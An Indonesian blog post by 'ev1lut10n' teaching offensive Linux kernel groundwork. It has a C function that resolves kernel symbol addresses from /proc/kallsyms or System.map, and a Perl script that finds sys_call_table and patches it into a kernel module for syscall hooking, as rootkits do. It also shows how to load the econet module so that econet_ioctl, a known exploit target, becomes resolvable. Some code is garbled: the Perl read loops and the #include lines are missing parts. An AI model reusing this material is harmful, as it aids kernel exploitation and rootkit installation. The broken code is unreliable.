Berikut fungsi yang digunakan untuk mendapatkan pointer yang menunjuk ke alamat memori suatu simbol kernel
================================
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}
===================
dengan passing by value pada fungsi pada program userspace di atas maka kita mendapatkan "void pointer" yang menunjuk pada alamat kernel memori dari nama simbol yang kita pass sbg
parameter fungsi.
karena kernel 2.6 maka kernel simbol umumnya bisa diakses di /proc/kallsyms:
==============
root@ev1lut10n-Vostro1310:/home/ev1lut10n/c/kernel# cat /proc/kallsyms | grep econet_ioctl
fcdfd2a0 t econet_ioctl [econet]
===============
misal kita passing by value "econet_ioctl":
========
econet_ioctl = get_kernel_sym("econet_ioctl");
========
maka :
=============
ev1lut10n@ev1lut10n-Vostro1310:~/c/kernel$ ./simbol
[+] Resolved econet_ioctl to 0xfcdfd2a0
=============
pada versi perl kita bisa membuat kode dengan kinerja serupa tapi alamat memori akan kita simpan di dalam variabel biasa bukan pointer:
=========
sub get_syscall_table_addr
{
eval
{
print "The Most Simple Method to get sys_call_table addr";
print "\nc0d3 by : ev1lut10n";
if($style=~"oldies")
{
$simpat="/proc/ksyms";
}
else
{
$simpat="/proc/kallsyms";
}
if(-e $simpat)
{
print "\n[+] Checkin $simpat\n";
open(KALLSYMS, "cat $simpat |");
while (
{
$tampilan_simbol .= $_;
($mem,$mode,$simbol) = split;
if($simbol=~/sys_call_table/)
{
got_and_replace_kmem($mem);
}
}
close(KALLSYMS);
}
else
{
print "\n[+] Checkin System.Map\n";
if(-e "/boot/System.map*")
{
$sysmap="/boot/System.map*";
}
else
{
$sysmap="/System.ma*";
}
open(SYSMAP, "cat /boot/System.ma* |");
while (
{
$tampilan_simbol .= $_;
($mem,$mode,$simbol) = split;
if($simbol=~/sys_call_table/)
{
got_and_replace_kmem($mem);
}
}
close(SYSMAP);
}
}
}
sub got_and_replace_kmem
{
$mem="0x".$mem;
print "[+] Got sys_call_table addr :".$mem."\n";
$oldies="0xdeadbeef";
print "\nreplacing ...\n";
print "\nReplacing 0xdeadbeef with $mem\n";
system("perl -p -i -e 's/$oldies/$mem/' ev1lut10n.c");
}
=========
misal ev1lut10n.c merupakan lkm yang mengandung line:
===
unsigned long *sys_call_table = (unsigned long *) 0xdeadbeef;
=====
ada beberapa kernel simbol yang belum ada di dalam kernel simbol table pada /proc/kallsyms sebelum run time memory dari fungsi yang berhubungan dg kernel simbol
====
root@ev1lut10n-Vostro1310:/home/ev1lut10n/c/kernel# cat /proc/kallsyms | grep econet
=====tidak ada======
====
untuk itu perlu socket PF_ECONET:
===
socket(PF_ECONET, SOCK_DGRAM, 0);
====
cat econet.c:
====
#include
#include
#include
#include
int main()
{
int socket=socket(PF_ECONET, SOCK_DGRAM, 0);
}
===========
gcc -o econet econet.c
cat /proc/kallsyms | grep econet
===
root@ev1lut10n-Vostro1310:/home/ev1lut10n/c/kernel# cat /proc/kallsyms | grep econet
fcdfd2fc t econet_proto_exit [econet]
fcdfdce0 b ab_cleanup_timer [econet]
fcdfdcc0 b udpsock [econet]
fcdfd5e0 d econet_netdev_notifier [econet]
fcdfd6e0 d econet_packet_type [econet]
fcdfd600 d econet_proto [econet]
fcdfd6b4 d econet_mutex [econet]
fcdfc0c0 t econet_bind [econet]
fcdfc130 t econet_getname [econet]
fcdfc1c0 t econet_sendmsg [econet]
fcdfd8c0 b net2dev_map [econet]
fcdfdcc4 b aun_seq [econet]
fcdfdcc8 b aun_queue [econet]
fcdfc790 t ec_tx_done [econet]
fcdfc6f0 t tx_result [econet]
fcdfc7b0 t econet_destroy_timer [econet]
fcdfc810 t econet_create [econet]
fcdfd3a0 r econet_ops [econet]
fcdfd6c8 d econet_lock [econet]
fcdfd8a4 b econet_sklist [econet]
fcdfc8e0 t econet_release [econet]
fcdfca00 t econet_rcv [econet]
fcdfcbe0 t econet_notifier [econet]
fcdfd8a0 b aun_queue_lock [econet]
fcdfccf0 t ab_cleanup [econet]
fcdfcfe0 t aun_data_available [econet]
fcdfcc50 t aun_tx_ack [econet]
fcdfd380 r econet_family_ops [econet]
fcdfcd90 t T.924 [econet]
fcdfce40 t aun_incoming [econet]
fcdfd0c0 t ec_dev_ioctl [econet]
fcdfd2a0 t econet_ioctl [econet]
fcdfc000 t econet_recvmsg [econet]
fcdfd720 d __this_module [econet]
fcdfd2fc t cleanup_module [econet]
==============
Posting Komentar